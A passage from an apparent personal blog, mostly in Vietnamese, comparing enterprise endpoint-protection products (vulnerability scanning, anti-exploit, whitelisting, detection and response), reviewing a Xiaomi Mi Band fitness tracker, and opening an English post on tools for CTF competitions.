Mục tiêu: Rà quét các lỗ hổng bảo mật trên endpoint(App, OS, Service, Network ...) và tình trạng update. Đồng thời thống kê thành dashboard cho người quản trị biết hiện trạng hệ thống công nghệ thông tin(CNTT) mình quản lý đang tồn tại những lỗ hổng nào để tiến hành cập nhật bản vá kịp thời.

Hầu hết các giải pháp Vulnerability Management hiện nay đều tập trung vào việc dò quét lỗ hổng bảo mật ở tầng network, OS và Service. Nghĩa là chỉ tập trung quét từ bên ngoài vào chứ chưa quan tâm đến các ứng dụng trên máy tính của Enduser(trừ Nessus). Ngoài ra trong đánh giá Top10 Endpoint protection cũng có đề cập đến tính năng này đã có trên một số sản phẩm, nhưng thực sự thì tôi chưa thấy tính năng này khi thử nghiệm?!?

Yêu cầu tối thiểu là phải scan được các lỗ hổng bảo mật ở mức OS(Windows, Linux, MacOS, tương lai có thể là Mobile), mức Service(Apache, tomcat, JBoss, Oracle, MySQL...) và mức App(Web browser, MS Office, Adobe Reader, Java ...)

2. Anti-Exploit

Mục tiêu: Bảo vệ các ứng dụng chưa kịp cập nhật bản vá lỗi tránh bị tấn công bằng cách làm chậm/làm khó việc exploit các lỗ hổng bảo mật.

Tôi thấy khá nhiều hãng đã quan tâm đến mảng này như Microsoft, PaloAlto, Malwarebytes và SurfRight

EMET của Microsoft: Phần mềm miễn phí với các tính năng cơ bản giúp hạn chế một số kiểu tấn công đơn giản nhưng không thích hợp để triển khai cho môi trường doanh nghiệp. Được tích hợp vào các phiên bản windows sau này.
TRAPS của PaloAlto: giải pháp khá tốt để triển khai cho doanh nghiệp(Hỗ trợ whitelisting) nhưng phiên bản tôi thử nghiệm thì Traps không chặn được exploit sử dụng javascript engine(Chrome và Firefox).
Endpoint Security của Malwarebytes: Về mặt cá nhân tôi thì đây là một giải pháp tương đối hoàn thiện về tư tưởng thiết kế cũng như triển khai cho doanh nghiệp, khi nào hoàn tất việc PoC tôi sẽ bổ sung sau.
HitmanPro.Alert của SurfRight: Về mặt tính năng thì giải pháp này khá tốt tuy nhiên trước giờ chỉ hướng đến đối tượng sử dụng cá nhân nên không phù hợp với môi trường doanh nghiệp. Hy vọng trong tương lai sẽ có điều chỉnh.
Trend Micro Vulnerability Protection: Có vài vấn đề tôi không thích cách tiếp cận này của TrendMicro

Có vulnerability scanning agent tuy nhiên lại không hề đưa ra thống kê report nào để người quản trị cập nhật bản vá.
Chặn các exploit theo dạng signature có sẵn nên số lượng rule khá lớn và có thể bị bypass.

Các giải pháp trên hầu hết là áp dụng cho windows, trên môi trường Linux(Chủ yếu là server) và MacOS thì khá hiếm(giải pháp thường thấy là Grsecurity or AppArmor + Chroot + ClamAV). Nếu bạn đọc biết được thêm các giải pháp nào khác thì bổ sung giúp

3. Whitelisting/Blacklisting

Mục tiêu: Là xây dựng các policy chỉ cho phép một vài ứng dụng được thực thi trên máy enduser(Whitelisting). Hoặc chặn các phần mềm độc hại(Blacklisting)

Thực sự nếu đối với các môi trường số lượng và chủng loại ứng dụng ít thay đổi thì nên làm whitelisting vì nó sẽ hạn chế được rất nhiều nguy cơ và rủi ro liên quan do malware gây nên, đặc biệt là trong bối cảnh Ransomware đang có dấu hiệu bùng phát.

Ngoài giải pháp Traps của PaloAlto nêu trên thì có khá nhiều hãng có sản phẩm "Next-Gen Endpoint Protection" đều trang bị sẵn như: SentinelOne, CarbonBlack và Cyclance

Các giải pháp trên ưu điểm là gọn nhẹ(không scan toàn bộ ổ cứng hay file) và đều dùng cơ chế phát hiện và ngăn chặn khi malware được thực thi. Nếu 3 giải pháp trên có thêm tính năng anti-exploit(hoặc monitor and protect process) thì khá hoàn hảo.

4. Malware Prevent

Mục tiêu: Phát hiện và ngăn các malware đã biết và phân tích hành vi để chặn các malware mới.

Hầu hết các giải pháp Anti-Virus truyền thống lẫn các sản phẩm "Next-Gen Endpoint Protection" đều có những tính năng này. Ưu tiên các sản phẩm gọn nhẹ, chạy được đa nền tảng.

5. Threat Detection and Response

Mục tiêu: Khi tất cả các vòng bảo vệ phía trên đều bị bypass thì đây là chốt chặn cuối cùng để bảo vệ enduser và xử lý việc gỡ bỏ, forensic và điều tra số.

Thường các giải pháp giúp ích rất nhiều cho các chuyên gia an ninh thông tin của doanh nghiệp nhanh chóng phát hiện và xử lý các sự có khi hệ thống CNTT bị tấn công. Các công ty có đội ngũ làm an toàn thông tin thì nên cân nhắc triển khai các giải pháp này.

Các sản phẩm tiêu biểu gồm trên thị trường gồm có: CounterTack Sentinel, Encase Guidance, CarbonBlack, RSA Endpoint, ...

6. Các yêu cầu khác

Personal Firewall: Hỗ trợ tạo rule giới hạn truy cập một số nhóm PC đặc thù của doanh nghiệp đồng thời cách ly PC bị nhiễm malware ra khỏi hệ thống một cách nhanh nhất
Hỗ trợ tốt các hệ thống SIEM hoặc Security Intelligence
Device Control và Data Loss Prevention: Có thể tuỳ chọn thêm nhưng cá nhân tôi không nên dồn quá nhiều tính năng cho phía endpoint.

Tổng Kết

Về mặt nguyên tắc thì không có giải pháp kỹ thuật nào là toàn diện vì thế phải cân nhắc lựa chọn giải pháp phù hợp. Xây dựng nhiều lớp phòng thủ để làm chậm kẻ tấn công và đội ngũ bảo mật phải nhanh chóng phát hiện sự cố(Reduce Time to Discover, Increase Time to Compromise).

-- Bài viết sẽ còn bổ sung và điều chỉnh --

Saturday, April 18, 2015

Thiết bị đeo thông minh

Mục tiêu ban đầu.

Năm 2015 được gọi là “Năm của đồng hồ đeo tay thông minh” khi mà các hãng lớn lần lượt nhảy vào cuộc đua với các sản phẩm đình đám như Apple Watch, Pebble, Android Wear. Cá nhân mình thấy các thiết bị đeo thông minh có rất nhiều tiện ích đặc biệt là việc theo dõi sức khoẻ. Cho nên bản thân mình cũng tìm hiểu và trải nghiệm một số thiết bị để xem có phù hợp với nhu cầu của bản thân hay không?

Mục tiêu đầu tiên khi lựa chọn các thiết bị đeo thông minh là chức năng theo dõi sức khoẻ. Vì mình có ý định mua một thiết bị đeo thông minh cho ba mẹ mình sử dụng.

Ba mẹ mình năm nay cũng lớn tuổi rồi, nên các bệnh về tim mạch, huyết áp cũng có dấu hiệu xuất hiện, việc theo dõi phát hiện bệnh sớm các nguy cơ sẽ giúp rất nhiều cho việc điều trị
Việc các thiết bị đeo thông minh kết nối đến smartphone giúp mình có thể dễ dàng biết được tình hình sức khoẻ của ba mẹ mình khi mình đi làm xa nhà.
Ngoài ra các tính năng nhắc nhở vận động, nhắc lịch uống thuốc cũng khá hay và hữu ích. Đối với mình ngồi máy tính nhiều nếu ngồi quá lâu thì hoàn toàn không tốt cho sức khoẻ, nếu được nhắc nhở thì có thể mình sẽ chú ý và ý thức vận động nhiều hơn :D Còn đối với việc nhắc lịch uống thuốc thì có thể có ích cho ba mẹ mình.

Một điều mình không thích lắm ở các thiết bị đeo thông minh hiện nay là giá thành khá cao và chỉ kết nối được với một số thiết bị nhất định. Android Wear chỉ hoạt động với smartphone chạy Android(có thể tương lai sẽ khác), Apple Watch chỉ hoạt động với iOS, Chỉ có một số thiết bị hoạt động được cả 2 nền tảng là Pebble, Fitbit, Nike fluel band, Xiaomi Band ... Hy vọng sắp tới các thiết bị đeo thông minh sẽ có giá dễ chịu hơn và hỗ trợ nhiều nền tảng hơn.

Mở hộp Xiaomi Band(Mi Band).

Giá thành tương đối rẻ, hỗ trợ 2 nền tảng Android và iOS

Hộp khá đơn giản theo phong cách chung của các thiết bị Xiaomi

Bên trong gồm cáp sạc, dây đeo, thiết bị, và sách hướng dẫn => Moá! có cáp sạc mà không có cục sạc :|

Khi gắn vào thì không biết gắn như thế nào để đeo cho phù hợp vì nó không có đánh dấu :D

Giao diện ứng dụng gồm có theo dõi bước chân và theo dõi giấc ngủ.

Thiết lập mục tiêu số bước đi trong ngày.

Hẹn giờ báo thức.

Chống nước khá tốt

Pin xài được khoảng 7 ngày, cá nhân mình thì xài lâu hơn, chắc một phần do iPhone không tận dụng nhiều tính năng của Mi Band và phần khác là cũng ít người gọi điện tới :D

Trải nghiệm Mi Band

Đếm bước chân đo lượng calo tiêu hao => Khi mình chạy xe máy khoảng 4 tiếng đồng hồ thì thiết bị vẫn đếm bước chân?!? Ngoài ra khi tập thể hình hay đánh cầu lông thì đo calo không chính xác.
Đo giấc ngủ không chính xác lắm, có thể là do không có cảm biến nhịp tim và app chưa tốt, vì khi mình ngủ trưa thì không tự nhận diện được :|
Thiếu tính năng xem giờ, hiển thị thông báo. Đã khá lâu rồi mình không đeo đồng hồ nhưng khi đeo Mi band đôi lúc vẫn vô thức đưa lên xem giờ :v Phần nữa chỉ với 3 đèn led thì mình chỉ thấy nó sáng khi mình hoàn tất mục tiêu tập luyện và khi có cuộc gọi đến.
Không có cảm biến đo nhịp tim: Đây cũng có lẽ là nguyên nhân chính khiến việc đo calo và giấc ngủ không chính xác.
Không có đo huyết áp đây là điểm điểm chung của hầu hết các thiết bị đeo thông minh hiện nay. Có lẽ cuộc đua thiết bị đeo thông minh chưa tập trung nhiều vào tính năng theo dõi sức khoẻ. Thiết bị hứa hẹn sẽ có cảm biến đo huyết áp được giới thiệu ở đây sẽ ra mắt vào tháng 6/2015. Các thiết bị đo huyết áp hiện nay khá lớn và không nhiều tính năng hy vọng những thiết bị đeo tương lai có thể thay thế các thiết bị y tế.

Một thiết bị đeo thông minh hoàn hảo(Theo ý kiến cá nhân)

Nhận diện chính xác mức độ vận động và tính toán lượng lượng calo tiêu hao => Điều này đòi hỏi phải có thêm cảm biến nhịp tim(thậm chí cảm biến huyết áp). Đồng thời app phải được phát triển tốt thì mới cho kết quả với độ chính xác cao. Theo mình thấy hiện nay thì hầu hết dân dev không có kiến thức sâu về sức khoẻ và các thông số, nhưng với tốc độ chạy đua công nghệ của các ông lớn hiện nay thì tương lai sẽ có nhiều sản phẩm làm tốt vấn đề này.
Theo dõi giấc ngủ chính xác và báo thức thông minh hơn. Ngoài các tính năng như nhắc đi ngủ đúng giờ thì app cũng phải tính toán được nên đánh thức người dùng lúc nào. VD: Tôi đi ngủ vào lúc 1h sáng Thay vì dậy cố định vào 6h thì cũng nên có tuỳ chọn đánh thức khi ngủ đủ giấc(ví dụ tôi muốn ngủ trong 3 chu kỳ giấc ngủ khoản 4.5 tiếng) lúc đó sẽ báo thức khoảng 5h30 hoặc 6h(tuỳ theo lúc tôi đi ngủ có ngủ được ngay hay không). Hoặc có thể theo dõi và thiết lập lịch ngủ theo phương pháp ngủ 4 tiếng/ngày
Theo dõi huyết áp, nhịp tim và đưa ra các cảnh báo tin nhắn/email khi bị lên hoặc tụt huyết áp. Và phát tín hiệu khẩn cấp(kèm tin nhắn) khi người đeo bị các triệu chứng nguy hiểm như nhồi máu cơ tim, đột quỵ ...
Hiển thị thời gian, tin nhắn, thông tin người gọi điện đến mà không phải lấy điện thoại ra xem.
Pin lâu, chống nước(có thể đeo đi bơi), hỗ trợ nhiều nền tảng Smartphone và giá cả dễ chịu hơn :D

Wednesday, March 18, 2015

Useful tools for CTF(Infosec)

I've selected useful and must-have tools for CTF games and computer security competitions. Most of this tools are often indispensable during the games (especially task-based/jeopardy CTF games).

I've combined tools by categories just like in CTF games: Reverse, Steganography, Networking, Forensics, Cryptography, Scripting.

Most of tools are cross-platform, but some of them are only for Windows or Linux.